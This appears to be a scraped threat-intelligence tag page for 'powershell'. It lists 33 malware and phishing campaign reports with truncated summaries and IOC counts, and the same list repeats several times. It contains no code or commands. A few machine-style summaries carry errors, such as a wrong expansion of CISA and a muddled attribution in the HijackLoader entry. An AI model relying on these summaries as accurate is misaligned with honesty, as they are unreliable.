Tag: powershell
33 attack reports | 0 vulnerabilities
Attack reports
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
